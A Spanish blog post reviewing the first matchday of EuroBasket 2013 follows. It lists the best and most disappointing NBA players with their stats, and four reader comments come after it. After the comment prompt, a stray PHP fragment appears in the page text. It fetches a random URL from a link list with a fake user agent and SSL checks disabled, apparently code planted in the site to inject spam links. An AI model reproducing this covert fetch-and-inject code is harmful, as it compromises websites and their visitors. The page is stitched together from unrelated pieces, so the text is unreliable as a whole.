EuroNBAsket 2013: Jornada 1

05 de September de 2013 por TheDeerHunter

Comenzó el baile. Jornada inaugural algo sosa, con marcadores más cercanos a los 50 puntos que a los 100, sinó fuera por las importantes sorpresas que se produjeron y que pueden cambiar el mapa de jerarquías de la competición. Lituania cayó ante la siempre difícil Serbia de Ivkovic, Francia se dió un batacazo morrocotudo ante Alemania, Turquía hizo el ridículo ante Finlandia, Rusia no pudo contra una sorprendente Italia, Israel se pegó un tiro en el pie con los tiros libres y cayó en el descuento ante Gran Bretaña, y Polonia prácticamente dice adiós apalizada por Georgia.

España y Grecia sí cumplieron con su papel arrasando a Croacia y Suecia respectivamente mientras que Eslovenia sudó de lo lindo para doblegar a la República Checa. Ukrania salvó los muebles remontando in extremis a Bélgica al contrario que Letonia que no tuvo grandes problemas ante la Bosnia y Herzegovina. El mejor partido de la jornada lo protagonizaron Montenegro y Macedonia con victoria final de los primeros polémica mediante.

No dejéis de leer el completo resumen que hacen, por ejemplo, en solobasket. Nosotros nos centramos en como lo hicieron los NBA. 

LOS MEJORES:

– Luigi Datome: Espectacular el nuevo rookie de los Pistons. MVP de la jornada y victoria de mucho prestigio. Volvió locos a los rusos con 25 puntos, 8 rebotes, 2 asistencias y 1 robo.
– Marco Belinelli: Con su habitual voluntad de cumplir y dar lo que necesita el equipo se complementó muy bien con Datome formando el mejor perímetro visto hasta ahora. 16 puntos, 5 asistencias, 3 rebotes y 2 robos,
– Marc Gasol: Imperial. Doble-doble que no refleja una actuación defensiva escandalosa. Ofensivamente estuvo algo más discreto de lo que nos tiene acostumbrados en Memphis aunque Croacia se centró mucho en su figura. 14 puntos, 11 rebotes, 1 asistencia, 1 tapón y 8 faltas provocadas.
– José Calderón: Finísimo en el tiro haciendo de Navarro. 13 puntos por encima del 60%, 3 asistencias y 2 rebotes. Fue la luz en un partido algo espeso de España en ataque.
– Nemanja Nedovic: Un puñal en el corazón de Lituania. Rapidísimo y muy agresivo en sus penetraciones supo sacar petróleo de sus acciones y hacer pagar cada error de su rival. 14 puntos con altos porcentajes, 5 rebotes, 3 asistencias y 1 robo. Lo tendrá más difícil en Golden State.
– Viacheslav Kravtsov: No fue su brillante actuación ofensiva lo que permitió a Ukrania remontar a Bélgica un choque más que complicado. 2 puntos nada más en una serie de tiro muy mala (1 de 6). En cambio, sí fue vital en defensa con 4 tapones, uno de ellos a un minuto y medio del final con el partido en el alambre. 2 puntos, 5 rebotes, 4 tapones y 1 robo.
– Jan Vesely: Por fin pudimos volver a disfrutar de su gran versión “europea”. Cuajó una actuación completísima con 17 puntos, 7 rebotes, 3 tapones, 1 asistencia y 1 robo. No fue suficiente para lograr la victoria pero sí para poner en muchos aprietos a los anfitriones.
– Tony Parker: 18 puntos, 4 asistencias. Se cargó a su equipo a la espalda y a punto estuvo de lograr la machada. No era el día. La defensa de Francia fue de risa.
– Alex Shved: Protanizó un bonito duelo ante Belinelli cuajando una actuación casi calcada a la suya. Fue el mejor de los rusos con 17 puntos, 5 asistencias, 3 rebotes y 2 robos.
– Mirza Teletovic: 18 puntos, 8 rebotes, 1 asistencia en un aparente buen partido. Decimos aparente porque firmó un 35% de acierto.
– Bojan Bogdanovic: Flojo en el tiro, nulo en triples, pero fue el único que logró inquietar a la férrea defensa de España. 12 puntos (de los 40 de su equipo), 7 rebotes, 1 asistencia.

DECEPCIONARON:

– Nikola Vucevic: Salió desde el banco para firmar una actuación discreta. En 14 minutos, 9 puntos y tan sólo 2 rebotes, 1 tapón y otra asistencia.
– Omer Asik: Discreto, y aún así fue el mejor menos malo NBA de su selección. 4 puntos, 6 rebotes, 1 tapón en 18 minutos.
– Hedo Turkoglu: En su línea. 2 de 12 en tiros para 8 puntos, 3 rebotes y 1 asistencia.
– Ersan Ilyasova: Desatado. Cuando está mal lo está con ganas. 1 de 9 y tres pérdidas. 3 tristes puntos, 6 rebotes, 1 robo y una asistencia.
– Sergey Karasev: Intrascendente el nuevo escolta de los Cavs. 17 minutos en los que lo falló casi todo. 3 puntos, 4 rebotes y 1 robo.
– Jonas Valanciunas: Aún estará buscando a Krstic. Nula incidencia en el juego y problemas de faltas. 2 puntos, 2 rebotes, 2 pérdidas. Eso sí, anotó la única canasta que intentó.
– Donatas Motiejunas: Apenas jugó 3 minutos.  Extraño.
– Johan Petro: Apenas jugó 3 minutos. Normal.

Comenta

4 comentarios a esta entrada

  1. jhc dice:
    #1

    Valla desastre ma supuesto en el supermanager la dupla vucevic-valanciunas 🙁 ni 10 puntos entre ambos

      Citar

  2. Nacho dice:
    #2

    Supongo que no se pueden poner muchos mejores del mismo equipo, pero me encantó el partido de Ricky. Esperando de una vez que las faltas en ataque provocadas sumen como robos en las estadísticas!!!!! Lástima sus tres faltas (excesivas) tempraneras.
    Se irá viendo en la segunda fase y cruces pero de momento España es la más seria (mucha culpa de Marc, que es otra cosa que no reflejan estadísticas)
    APARTADO SORPRESAS:
    Claver: A poco que se suelte en ataque (capacidad tiene, aunque no sea bien visto en este foro) será sin duda el MIP del campeonato.
    De momento nada más, solo pude ver a España (Croacia no apareció) Según vea más analizaré otros MIP.

      Citar

  3. rumbero dice:
    #3

    En Washington deben estar locos de contentos cada vez que ven a Vesely salirse con Chequia (24/14 con 4 robos se acaba de marcar). Seguro que este año ‘explota’ si o si 😀

      Citar

  4. Denise dice:
    #4

    rumbero:
    En Washington deben estar locos de contentos cada vez que ven a Vesely salirse con Chequia (24/14 con 4 robos se acaba de marcar). Seguro que este año ‘explota’ si o si

    A mi no me sorprende, Vesely es muy bueno, otra cosa es el expediente X de por qué no ha cuajado en la NBA, pero cuando estaba en Europa era una estrella y un tio que desequilibraba partidos, a diferencia de Claver por ejemplo que se fue a la NBA siendo uno más…
    Y un jugador que a nivel europeo lo veo infravalorado y a mi me encanta es Satoransky, pedazo jugador capaz de hacer de todo y bastante versátil en el perímetro. Ojala la República Checa pueda en los proximos años formar un buen grupito en torno a Vesely y dar guerra al menos en los torneos continentales, es un pais que me encanta y en todos los deportes siempre voy con ellos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>